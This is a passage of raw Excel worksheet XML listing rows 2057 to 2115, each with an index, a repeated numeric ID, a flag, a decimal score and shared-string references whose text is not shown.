      </c>
      <c r="D2057">
        <v>1</v>
      </c>
      <c r="E2057">
        <v>0.99220001697540283</v>
      </c>
      <c r="F2057" t="s">
        <v>3911</v>
      </c>
      <c r="G2057" t="s">
        <v>4056</v>
      </c>
      <c r="H2057" t="s">
        <v>4057</v>
      </c>
    </row>
    <row r="2058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2058" s="1">
        <v>2056</v>
      </c>
      <c r="B2058">
        <v>6824</v>
      </c>
      <c r="C2058">
        <v>6824</v>
      </c>
      <c r="D2058">
        <v>1</v>
      </c>
      <c r="E2058">
        <v>0.76740002632141113</v>
      </c>
      <c r="F2058" t="s">
        <v>3911</v>
      </c>
      <c r="G2058" t="s">
        <v>4058</v>
      </c>
      <c r="H2058" t="s">
        <v>4059</v>
      </c>
    </row>
    <row r="2059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2059" s="1">
        <v>2057</v>
      </c>
      <c r="B2059">
        <v>2356</v>
      </c>
      <c r="C2059">
        <v>2356</v>
      </c>
      <c r="D2059">
        <v>1</v>
      </c>
      <c r="E2059">
        <v>0.9976000189781189</v>
      </c>
      <c r="F2059" t="s">
        <v>3911</v>
      </c>
      <c r="G2059" t="s">
        <v>4060</v>
      </c>
      <c r="H2059" t="s">
        <v>4061</v>
      </c>
    </row>
    <row r="2060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2060" s="1">
        <v>2058</v>
      </c>
      <c r="B2060">
        <v>2457</v>
      </c>
      <c r="C2060">
        <v>2457</v>
      </c>
      <c r="D2060">
        <v>1</v>
      </c>
      <c r="E2060">
        <v>0.94779998064041138</v>
      </c>
      <c r="F2060" t="s">
        <v>3911</v>
      </c>
      <c r="G2060" t="s">
        <v>4062</v>
      </c>
      <c r="H2060" t="s">
        <v>4063</v>
      </c>
    </row>
    <row r="2061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2061" s="1">
        <v>2059</v>
      </c>
      <c r="B2061">
        <v>2751</v>
      </c>
      <c r="C2061">
        <v>2751</v>
      </c>
      <c r="D2061">
        <v>1</v>
      </c>
      <c r="E2061">
        <v>0.99029999971389771</v>
      </c>
      <c r="F2061" t="s">
        <v>3911</v>
      </c>
      <c r="G2061" t="s">
        <v>4064</v>
      </c>
      <c r="H2061" t="s">
        <v>4065</v>
      </c>
    </row>
    <row r="2062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2062" s="1">
        <v>2060</v>
      </c>
      <c r="B2062">
        <v>645</v>
      </c>
      <c r="C2062">
        <v>645</v>
      </c>
      <c r="D2062">
        <v>1</v>
      </c>
      <c r="E2062">
        <v>0.86220002174377441</v>
      </c>
      <c r="F2062" t="s">
        <v>3911</v>
      </c>
      <c r="G2062" t="s">
        <v>4066</v>
      </c>
      <c r="H2062" t="s">
        <v>4067</v>
      </c>
    </row>
    <row r="2063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2063" s="1">
        <v>2061</v>
      </c>
      <c r="B2063">
        <v>3968</v>
      </c>
      <c r="C2063">
        <v>3968</v>
      </c>
      <c r="D2063">
        <v>1</v>
      </c>
      <c r="E2063">
        <v>0.99940001964569092</v>
      </c>
      <c r="F2063" t="s">
        <v>3911</v>
      </c>
      <c r="G2063" t="s">
        <v>4068</v>
      </c>
      <c r="H2063" t="s">
        <v>4069</v>
      </c>
    </row>
    <row r="2064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2064" s="1">
        <v>2062</v>
      </c>
      <c r="B2064">
        <v>3938</v>
      </c>
      <c r="C2064">
        <v>3938</v>
      </c>
      <c r="D2064">
        <v>1</v>
      </c>
      <c r="E2064">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2064" t="s">
        <v>3911</v>
      </c>
      <c r="G2064" t="s">
        <v>4070</v>
      </c>
      <c r="H2064" t="s">
        <v>4071</v>
      </c>
    </row>
    <row r="2065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2065" s="1">
        <v>2063</v>
      </c>
      <c r="B2065">
        <v>4306</v>
      </c>
      <c r="C2065">
        <v>4306</v>
      </c>
      <c r="D2065">
        <v>1</v>
      </c>
      <c r="E2065">
        <v>0.67049998044967651</v>
      </c>
      <c r="F2065" t="s">
        <v>3911</v>
      </c>
      <c r="G2065" t="s">
        <v>4072</v>
      </c>
      <c r="H2065" t="s">
        <v>4073</v>
      </c>
    </row>
    <row r="2066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2066" s="1">
        <v>2064</v>
      </c>
      <c r="B2066">
        <v>2395</v>
      </c>
      <c r="C2066">
        <v>2395</v>
      </c>
      <c r="D2066">
        <v>1</v>
      </c>
      <c r="E2066">
        <v>0.52579998970031738</v>
      </c>
      <c r="F2066" t="s">
        <v>3911</v>
      </c>
      <c r="G2066" t="s">
        <v>4074</v>
      </c>
      <c r="H2066" t="s">
        <v>4075</v>
      </c>
    </row>
    <row r="2067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2067" s="1">
        <v>2065</v>
      </c>
      <c r="B2067">
        <v>3011</v>
      </c>
      <c r="C2067">
        <v>3011</v>
      </c>
      <c r="D2067">
        <v>1</v>
      </c>
      <c r="E2067">
        <v>0.60729998350143433</v>
      </c>
      <c r="F2067" t="s">
        <v>3911</v>
      </c>
      <c r="G2067" t="s">
        <v>4076</v>
      </c>
      <c r="H2067" t="s">
        <v>4077</v>
      </c>
    </row>
    <row r="2068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2068" s="1">
        <v>2066</v>
      </c>
      <c r="B2068">
        <v>662</v>
      </c>
      <c r="C2068">
        <v>662</v>
      </c>
      <c r="D2068">
        <v>1</v>
      </c>
      <c r="E2068">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2068" t="s">
        <v>3911</v>
      </c>
      <c r="G2068" t="s">
        <v>4078</v>
      </c>
      <c r="H2068" t="s">
        <v>4079</v>
      </c>
    </row>
    <row r="2069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2069" s="1">
        <v>2067</v>
      </c>
      <c r="B2069">
        <v>4303</v>
      </c>
      <c r="C2069">
        <v>4303</v>
      </c>
      <c r="D2069">
        <v>1</v>
      </c>
      <c r="E2069">
        <v>0.642799973487854</v>
      </c>
      <c r="F2069" t="s">
        <v>3911</v>
      </c>
      <c r="G2069" t="s">
        <v>4080</v>
      </c>
      <c r="H2069" t="s">
        <v>4081</v>
      </c>
    </row>
    <row r="2070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2070" s="1">
        <v>2068</v>
      </c>
      <c r="B2070">
        <v>3955</v>
      </c>
      <c r="C2070">
        <v>3955</v>
      </c>
      <c r="D2070">
        <v>1</v>
      </c>
      <c r="E2070">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2070" t="s">
        <v>3911</v>
      </c>
      <c r="G2070" t="s">
        <v>4082</v>
      </c>
      <c r="H2070" t="s">
        <v>4083</v>
      </c>
    </row>
    <row r="2071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2071" s="1">
        <v>2069</v>
      </c>
      <c r="B2071">
        <v>4302</v>
      </c>
      <c r="C2071">
        <v>4302</v>
      </c>
      <c r="D2071">
        <v>1</v>
      </c>
      <c r="E2071">
        <v>0.38220000267028809</v>
      </c>
      <c r="F2071" t="s">
        <v>3911</v>
      </c>
      <c r="G2071" t="s">
        <v>4084</v>
      </c>
      <c r="H2071" t="s">
        <v>4085</v>
      </c>
    </row>
    <row r="2072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2072" s="1">
        <v>2070</v>
      </c>
      <c r="B2072">
        <v>4308</v>
      </c>
      <c r="C2072">
        <v>4308</v>
      </c>
      <c r="D2072">
        <v>1</v>
      </c>
      <c r="E2072">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2072" t="s">
        <v>3911</v>
      </c>
      <c r="G2072" t="s">
        <v>4086</v>
      </c>
      <c r="H2072" t="s">
        <v>4087</v>
      </c>
    </row>
    <row r="2073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2073" s="1">
        <v>2071</v>
      </c>
      <c r="B2073">
        <v>2744</v>
      </c>
      <c r="C2073">
        <v>2744</v>
      </c>
      <c r="D2073">
        <v>1</v>
      </c>
      <c r="E2073">
        <v>0.99959999322891235</v>
      </c>
      <c r="F2073" t="s">
        <v>3911</v>
      </c>
      <c r="G2073" t="s">
        <v>4088</v>
      </c>
      <c r="H2073" t="s">
        <v>4089</v>
      </c>
    </row>
    <row r="2074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2074" s="1">
        <v>2072</v>
      </c>
      <c r="B2074">
        <v>2998</v>
      </c>
      <c r="C2074">
        <v>2998</v>
      </c>
      <c r="D2074">
        <v>1</v>
      </c>
      <c r="E2074">
        <v>0.82620000839233398</v>
      </c>
      <c r="F2074" t="s">
        <v>3911</v>
      </c>
      <c r="G2074" t="s">
        <v>4090</v>
      </c>
      <c r="H2074" t="s">
        <v>4091</v>
      </c>
    </row>
    <row r="2075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2075" s="1">
        <v>2073</v>
      </c>
      <c r="B2075">
        <v>3957</v>
      </c>
      <c r="C2075">
        <v>3957</v>
      </c>
      <c r="D2075">
        <v>1</v>
      </c>
      <c r="E2075">
        <v>0.87929999828338623</v>
      </c>
      <c r="F2075" t="s">
        <v>3911</v>
      </c>
      <c r="G2075" t="s">
        <v>4092</v>
      </c>
      <c r="H2075" t="s">
        <v>4093</v>
      </c>
    </row>
    <row r="2076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2076" s="1">
        <v>2074</v>
      </c>
      <c r="B2076">
        <v>6198</v>
      </c>
      <c r="C2076">
        <v>6198</v>
      </c>
      <c r="D2076">
        <v>1</v>
      </c>
      <c r="E2076">
        <v>0.99819999933242798</v>
      </c>
      <c r="F2076" t="s">
        <v>3911</v>
      </c>
      <c r="G2076" t="s">
        <v>4094</v>
      </c>
      <c r="H2076" t="s">
        <v>4095</v>
      </c>
    </row>
    <row r="2077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2077" s="1">
        <v>2075</v>
      </c>
      <c r="B2077">
        <v>660</v>
      </c>
      <c r="C2077">
        <v>660</v>
      </c>
      <c r="D2077">
        <v>1</v>
      </c>
      <c r="E2077">
        <v>0.68669998645782471</v>
      </c>
      <c r="F2077" t="s">
        <v>3911</v>
      </c>
      <c r="G2077" t="s">
        <v>4096</v>
      </c>
      <c r="H2077" t="s">
        <v>4097</v>
      </c>
    </row>
    <row r="2078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2078" s="1">
        <v>2076</v>
      </c>
      <c r="B2078">
        <v>3958</v>
      </c>
      <c r="C2078">
        <v>3958</v>
      </c>
      <c r="D2078">
        <v>1</v>
      </c>
      <c r="E2078">
        <v>0.99599999189376831</v>
      </c>
      <c r="F2078" t="s">
        <v>3911</v>
      </c>
      <c r="G2078" t="s">
        <v>4098</v>
      </c>
      <c r="H2078" t="s">
        <v>4099</v>
      </c>
    </row>
    <row r="2079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2079" s="1">
        <v>2077</v>
      </c>
      <c r="B2079">
        <v>5635</v>
      </c>
      <c r="C2079">
        <v>5635</v>
      </c>
      <c r="D2079">
        <v>1</v>
      </c>
      <c r="E2079">
        <v>0.81260001659393311</v>
      </c>
      <c r="F2079" t="s">
        <v>3911</v>
      </c>
      <c r="G2079" t="s">
        <v>4100</v>
      </c>
      <c r="H2079" t="s">
        <v>4101</v>
      </c>
    </row>
    <row r="2080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2080" s="1">
        <v>2078</v>
      </c>
      <c r="B2080">
        <v>6704</v>
      </c>
      <c r="C2080">
        <v>6704</v>
      </c>
      <c r="D2080">
        <v>1</v>
      </c>
      <c r="E2080">
        <v>0.88289999961853027</v>
      </c>
      <c r="F2080" t="s">
        <v>3911</v>
      </c>
      <c r="G2080" t="s">
        <v>4102</v>
      </c>
      <c r="H2080" t="s">
        <v>4103</v>
      </c>
    </row>
    <row r="2081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2081" s="1">
        <v>2079</v>
      </c>
      <c r="B2081">
        <v>4297</v>
      </c>
      <c r="C2081">
        <v>4297</v>
      </c>
      <c r="D2081">
        <v>1</v>
      </c>
      <c r="E2081">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2081" t="s">
        <v>3911</v>
      </c>
      <c r="G2081" t="s">
        <v>4104</v>
      </c>
      <c r="H2081" t="s">
        <v>4105</v>
      </c>
    </row>
    <row r="2082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2082" s="1">
        <v>2080</v>
      </c>
      <c r="B2082">
        <v>5379</v>
      </c>
      <c r="C2082">
        <v>5379</v>
      </c>
      <c r="D2082">
        <v>1</v>
      </c>
      <c r="E2082">
        <v>0.9682999849319458</v>
      </c>
      <c r="F2082" t="s">
        <v>3911</v>
      </c>
      <c r="G2082" t="s">
        <v>4106</v>
      </c>
      <c r="H2082" t="s">
        <v>4107</v>
      </c>
    </row>
    <row r="2083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2083" s="1">
        <v>2081</v>
      </c>
      <c r="B2083">
        <v>495</v>
      </c>
      <c r="C2083">
        <v>495</v>
      </c>
      <c r="D2083">
        <v>1</v>
      </c>
      <c r="E2083">
        <v>0.61269998550415039</v>
      </c>
      <c r="F2083" t="s">
        <v>3911</v>
      </c>
      <c r="G2083" t="s">
        <v>4108</v>
      </c>
      <c r="H2083" t="s">
        <v>4109</v>
      </c>
    </row>
    <row r="2084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2084" s="1">
        <v>2082</v>
      </c>
      <c r="B2084">
        <v>5726</v>
      </c>
      <c r="C2084">
        <v>5726</v>
      </c>
      <c r="D2084">
        <v>1</v>
      </c>
      <c r="E2084">
        <v>0.46149998903274542</v>
      </c>
      <c r="F2084" t="s">
        <v>3911</v>
      </c>
      <c r="G2084" t="s">
        <v>4110</v>
      </c>
      <c r="H2084" t="s">
        <v>4111</v>
      </c>
    </row>
    <row r="2085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2085" s="1">
        <v>2083</v>
      </c>
      <c r="B2085">
        <v>4311</v>
      </c>
      <c r="C2085">
        <v>4311</v>
      </c>
      <c r="D2085">
        <v>1</v>
      </c>
      <c r="E2085">
        <v>0.96119999885559082</v>
      </c>
      <c r="F2085" t="s">
        <v>3911</v>
      </c>
      <c r="G2085" t="s">
        <v>4112</v>
      </c>
      <c r="H2085" t="s">
        <v>4113</v>
      </c>
    </row>
    <row r="2086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2086" s="1">
        <v>2084</v>
      </c>
      <c r="B2086">
        <v>3937</v>
      </c>
      <c r="C2086">
        <v>3937</v>
      </c>
      <c r="D2086">
        <v>1</v>
      </c>
      <c r="E2086">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2086" t="s">
        <v>3911</v>
      </c>
      <c r="G2086" t="s">
        <v>4114</v>
      </c>
      <c r="H2086" t="s">
        <v>4115</v>
      </c>
    </row>
    <row r="2087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2087" s="1">
        <v>2085</v>
      </c>
      <c r="B2087">
        <v>309</v>
      </c>
      <c r="C2087">
        <v>309</v>
      </c>
      <c r="D2087">
        <v>1</v>
      </c>
      <c r="E2087">
        <v>0.54079997539520264</v>
      </c>
      <c r="F2087" t="s">
        <v>3911</v>
      </c>
      <c r="G2087" t="s">
        <v>4116</v>
      </c>
      <c r="H2087" t="s">
        <v>4117</v>
      </c>
    </row>
    <row r="2088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2088" s="1">
        <v>2086</v>
      </c>
      <c r="B2088">
        <v>7633</v>
      </c>
      <c r="C2088">
        <v>7633</v>
      </c>
      <c r="D2088">
        <v>1</v>
      </c>
      <c r="E2088">
        <v>0.67430001497268677</v>
      </c>
      <c r="F2088" t="s">
        <v>3911</v>
      </c>
      <c r="G2088" t="s">
        <v>4118</v>
      </c>
      <c r="H2088" t="s">
        <v>4119</v>
      </c>
    </row>
    <row r="2089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2089" s="1">
        <v>2087</v>
      </c>
      <c r="B2089">
        <v>670</v>
      </c>
      <c r="C2089">
        <v>670</v>
      </c>
      <c r="D2089">
        <v>1</v>
      </c>
      <c r="E2089">
        <v>0.83780002593994141</v>
      </c>
      <c r="F2089" t="s">
        <v>3911</v>
      </c>
      <c r="G2089" t="s">
        <v>4120</v>
      </c>
      <c r="H2089" t="s">
        <v>4121</v>
      </c>
    </row>
    <row r="2090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2090" s="1">
        <v>2088</v>
      </c>
      <c r="B2090">
        <v>4320</v>
      </c>
      <c r="C2090">
        <v>4320</v>
      </c>
      <c r="D2090">
        <v>1</v>
      </c>
      <c r="E2090">
        <v>0.85939997434616089</v>
      </c>
      <c r="F2090" t="s">
        <v>3911</v>
      </c>
      <c r="G2090" t="s">
        <v>4122</v>
      </c>
      <c r="H2090" t="s">
        <v>4123</v>
      </c>
    </row>
    <row r="2091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2091" s="1">
        <v>2089</v>
      </c>
      <c r="B2091">
        <v>2747</v>
      </c>
      <c r="C2091">
        <v>2747</v>
      </c>
      <c r="D2091">
        <v>1</v>
      </c>
      <c r="E2091">
        <v>0.67100000381469727</v>
      </c>
      <c r="F2091" t="s">
        <v>3911</v>
      </c>
      <c r="G2091" t="s">
        <v>4124</v>
      </c>
      <c r="H2091" t="s">
        <v>4125</v>
      </c>
    </row>
    <row r="2092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2092" s="1">
        <v>2090</v>
      </c>
      <c r="B2092">
        <v>669</v>
      </c>
      <c r="C2092">
        <v>669</v>
      </c>
      <c r="D2092">
        <v>1</v>
      </c>
      <c r="E2092">
        <v>0.54189997911453247</v>
      </c>
      <c r="F2092" t="s">
        <v>3911</v>
      </c>
      <c r="G2092" t="s">
        <v>4126</v>
      </c>
      <c r="H2092" t="s">
        <v>4127</v>
      </c>
    </row>
    <row r="2093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2093" s="1">
        <v>2091</v>
      </c>
      <c r="B2093">
        <v>3902</v>
      </c>
      <c r="C2093">
        <v>3902</v>
      </c>
      <c r="D2093">
        <v>1</v>
      </c>
      <c r="E2093">
        <v>0.8246999979019165</v>
      </c>
      <c r="F2093" t="s">
        <v>3911</v>
      </c>
      <c r="G2093" t="s">
        <v>4128</v>
      </c>
      <c r="H2093" t="s">
        <v>4129</v>
      </c>
    </row>
    <row r="2094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2094" s="1">
        <v>2092</v>
      </c>
      <c r="B2094">
        <v>5711</v>
      </c>
      <c r="C2094">
        <v>5711</v>
      </c>
      <c r="D2094">
        <v>1</v>
      </c>
      <c r="E2094">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2094" t="s">
        <v>3911</v>
      </c>
      <c r="G2094" t="s">
        <v>4130</v>
      </c>
      <c r="H2094" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="2095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2095" s="1">
        <v>2093</v>
      </c>
      <c r="B2095">
        <v>6087</v>
      </c>
      <c r="C2095">
        <v>6087</v>
      </c>
      <c r="D2095">
        <v>1</v>
      </c>
      <c r="E2095">
        <v>0.60790002346038818</v>
      </c>
      <c r="F2095" t="s">
        <v>3911</v>
      </c>
      <c r="G2095" t="s">
        <v>4132</v>
      </c>
      <c r="H2095" t="s">
        <v>4133</v>
      </c>
    </row>
    <row r="2096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2096" s="1">
        <v>2094</v>
      </c>
      <c r="B2096">
        <v>3269</v>
      </c>
      <c r="C2096">
        <v>3269</v>
      </c>
      <c r="D2096">
        <v>1</v>
      </c>
      <c r="E2096">
        <v>0.65859997272491455</v>
      </c>
      <c r="F2096" t="s">
        <v>3911</v>
      </c>
      <c r="G2096" t="s">
        <v>4134</v>
      </c>
      <c r="H2096" t="s">
        <v>4135</v>
      </c>
    </row>
    <row r="2097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2097" s="1">
        <v>2095</v>
      </c>
      <c r="B2097">
        <v>3936</v>
      </c>
      <c r="C2097">
        <v>3936</v>
      </c>
      <c r="D2097">
        <v>1</v>
      </c>
      <c r="E2097">
        <v>0.87680000066757202</v>
      </c>
      <c r="F2097" t="s">
        <v>3911</v>
      </c>
      <c r="G2097" t="s">
        <v>4136</v>
      </c>
      <c r="H2097" t="s">
        <v>4137</v>
      </c>
    </row>
    <row r="2098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2098" s="1">
        <v>2096</v>
      </c>
      <c r="B2098">
        <v>3034</v>
      </c>
      <c r="C2098">
        <v>3034</v>
      </c>
      <c r="D2098">
        <v>1</v>
      </c>
      <c r="E2098">
        <v>0.53140002489089966</v>
      </c>
      <c r="F2098" t="s">
        <v>3911</v>
      </c>
      <c r="G2098" t="s">
        <v>4138</v>
      </c>
      <c r="H2098" t="s">
        <v>4139</v>
      </c>
    </row>
    <row r="2099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2099" s="1">
        <v>2097</v>
      </c>
      <c r="B2099">
        <v>6085</v>
      </c>
      <c r="C2099">
        <v>6085</v>
      </c>
      <c r="D2099">
        <v>1</v>
      </c>
      <c r="E2099">
        <v>0.64259999990463257</v>
      </c>
      <c r="F2099" t="s">
        <v>3911</v>
      </c>
      <c r="G2099" t="s">
        <v>4140</v>
      </c>
      <c r="H2099" t="s">
        <v>4141</v>
      </c>
    </row>
    <row r="2100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2100" s="1">
        <v>2098</v>
      </c>
      <c r="B2100">
        <v>4324</v>
      </c>
      <c r="C2100">
        <v>4324</v>
      </c>
      <c r="D2100">
        <v>1</v>
      </c>
      <c r="E2100">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2100" t="s">
        <v>3911</v>
      </c>
      <c r="G2100" t="s">
        <v>4142</v>
      </c>
      <c r="H2100" t="s">
        <v>4143</v>
      </c>
    </row>
    <row r="2101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2101" s="1">
        <v>2099</v>
      </c>
      <c r="B2101">
        <v>4314</v>
      </c>
      <c r="C2101">
        <v>4314</v>
      </c>
      <c r="D2101">
        <v>1</v>
      </c>
      <c r="E2101">
        <v>0.96939998865127563</v>
      </c>
      <c r="F2101" t="s">
        <v>3911</v>
      </c>
      <c r="G2101" t="s">
        <v>4144</v>
      </c>
      <c r="H2101" t="s">
        <v>4145</v>
      </c>
    </row>
    <row r="2102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2102" s="1">
        <v>2100</v>
      </c>
      <c r="B2102">
        <v>4325</v>
      </c>
      <c r="C2102">
        <v>4325</v>
      </c>
      <c r="D2102">
        <v>1</v>
      </c>
      <c r="E2102">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2102" t="s">
        <v>3911</v>
      </c>
      <c r="G2102" t="s">
        <v>4146</v>
      </c>
      <c r="H2102" t="s">
        <v>4147</v>
      </c>
    </row>
    <row r="2103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2103" s="1">
        <v>2101</v>
      </c>
      <c r="B2103">
        <v>5380</v>
      </c>
      <c r="C2103">
        <v>5380</v>
      </c>
      <c r="D2103">
        <v>1</v>
      </c>
      <c r="E2103">
        <v>0.83689999580383301</v>
      </c>
      <c r="F2103" t="s">
        <v>3911</v>
      </c>
      <c r="G2103" t="s">
        <v>4148</v>
      </c>
      <c r="H2103" t="s">
        <v>4149</v>
      </c>
    </row>
    <row r="2104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2104" s="1">
        <v>2102</v>
      </c>
      <c r="B2104">
        <v>5725</v>
      </c>
      <c r="C2104">
        <v>5725</v>
      </c>
      <c r="D2104">
        <v>1</v>
      </c>
      <c r="E2104">
        <v>0.58520001173019409</v>
      </c>
      <c r="F2104" t="s">
        <v>3911</v>
      </c>
      <c r="G2104" t="s">
        <v>4150</v>
      </c>
      <c r="H2104" t="s">
        <v>4151</v>
      </c>
    </row>
    <row r="2105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2105" s="1">
        <v>2103</v>
      </c>
      <c r="B2105">
        <v>3969</v>
      </c>
      <c r="C2105">
        <v>3969</v>
      </c>
      <c r="D2105">
        <v>1</v>
      </c>
      <c r="E2105">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2105" t="s">
        <v>3911</v>
      </c>
      <c r="G2105" t="s">
        <v>4152</v>
      </c>
      <c r="H2105" t="s">
        <v>4153</v>
      </c>
    </row>
    <row r="2106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2106" s="1">
        <v>2104</v>
      </c>
      <c r="B2106">
        <v>3012</v>
      </c>
      <c r="C2106">
        <v>3012</v>
      </c>
      <c r="D2106">
        <v>1</v>
      </c>
      <c r="E2106">
        <v>0.99299997091293335</v>
      </c>
      <c r="F2106" t="s">
        <v>3911</v>
      </c>
      <c r="G2106" t="s">
        <v>4154</v>
      </c>
      <c r="H2106" t="s">
        <v>4155</v>
      </c>
    </row>
    <row r="2107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2107" s="1">
        <v>2105</v>
      </c>
      <c r="B2107">
        <v>393</v>
      </c>
      <c r="C2107">
        <v>393</v>
      </c>
      <c r="D2107">
        <v>1</v>
      </c>
      <c r="E2107">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2107" t="s">
        <v>3911</v>
      </c>
      <c r="G2107" t="s">
        <v>4156</v>
      </c>
      <c r="H2107" t="s">
        <v>4157</v>
      </c>
    </row>
    <row r="2108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2108" s="1">
        <v>2106</v>
      </c>
      <c r="B2108">
        <v>2423</v>
      </c>
      <c r="C2108">
        <v>2423</v>
      </c>
      <c r="D2108">
        <v>1</v>
      </c>
      <c r="E2108">
        <v>0.99839997291564941</v>
      </c>
      <c r="F2108" t="s">
        <v>3911</v>
      </c>
      <c r="G2108" t="s">
        <v>4158</v>
      </c>
      <c r="H2108" t="s">
        <v>4159</v>
      </c>
    </row>
    <row r="2109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2109" s="1">
        <v>2107</v>
      </c>
      <c r="B2109">
        <v>6200</v>
      </c>
      <c r="C2109">
        <v>6200</v>
      </c>
      <c r="D2109">
        <v>1</v>
      </c>
      <c r="E2109">
        <v>0.99690002202987671</v>
      </c>
      <c r="F2109" t="s">
        <v>3911</v>
      </c>
      <c r="G2109" t="s">
        <v>4160</v>
      </c>
      <c r="H2109" t="s">
        <v>4161</v>
      </c>
    </row>
    <row r="2110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2110" s="1">
        <v>2108</v>
      </c>
      <c r="B2110">
        <v>2424</v>
      </c>
      <c r="C2110">
        <v>2424</v>
      </c>
      <c r="D2110">
        <v>1</v>
      </c>
      <c r="E2110">
        <v>0.99559998512268066</v>
      </c>
      <c r="F2110" t="s">
        <v>3911</v>
      </c>
      <c r="G2110" t="s">
        <v>4162</v>
      </c>
      <c r="H2110" t="s">
        <v>4163</v>
      </c>
    </row>
    <row r="2111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2111" s="1">
        <v>2109</v>
      </c>
      <c r="B2111">
        <v>3128</v>
      </c>
      <c r="C2111">
        <v>3128</v>
      </c>
      <c r="D2111">
        <v>1</v>
      </c>
      <c r="E2111">
        <v>0.76770001649856567</v>
      </c>
      <c r="F2111" t="s">
        <v>3911</v>
      </c>
      <c r="G2111" t="s">
        <v>4164</v>
      </c>
      <c r="H2111" t="s">
        <v>4165</v>
      </c>
    </row>
    <row r="2112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2112" s="1">
        <v>2110</v>
      </c>
      <c r="B2112">
        <v>2978</v>
      </c>
      <c r="C2112">
        <v>2978</v>
      </c>
      <c r="D2112">
        <v>1</v>
      </c>
      <c r="E2112">
        <v>0.89550000429153442</v>
      </c>
      <c r="F2112" t="s">
        <v>3911</v>
      </c>
      <c r="G2112" t="s">
        <v>4166</v>
      </c>
      <c r="H2112" t="s">
        <v>4167</v>
      </c>
    </row>
    <row r="2113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2113" s="1">
        <v>2111</v>
      </c>
      <c r="B2113">
        <v>4331</v>
      </c>
      <c r="C2113">
        <v>4331</v>
      </c>
      <c r="D2113">
        <v>1</v>
      </c>
      <c r="E2113">
        <v>0.64310002326965332</v>
      </c>
      <c r="F2113" t="s">
        <v>3911</v>
      </c>
      <c r="G2113" t="s">
        <v>4168</v>
      </c>
      <c r="H2113" t="s">
        <v>4169</v>
      </c>
    </row>
    <row r="2114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2114" s="1">
        <v>2112</v>
      </c>
      <c r="B2114">
        <v>6197</v>
      </c>
      <c r="C2114">
        <v>6197</v>
      </c>
      <c r="D2114">
        <v>1</v>
      </c>
      <c r="E2114">
        <v>0.993399977684021</v>
      </c>
      <c r="F2114" t="s">
        <v>3911</v>
      </c>
      <c r="G2114" t="s">
        <v>4170</v>
      </c>
      <c r="H2114" t="s">
        <v>4171</v>
      </c>
    </row>
    <row r="2115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2115" s="1">
        <v>2113</v>
      </c>
      <c r="B2115">
        <v>3015</v>
      </c>
      <c r="C2115">
        <v>3015</v>
      </c>
      <c r="D2115">
        <v>1</v>
      </c>
      <c r="E2115">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2115" t="s">
        <v>3911</v>
      </c>
      <c r="G2115" t="s">
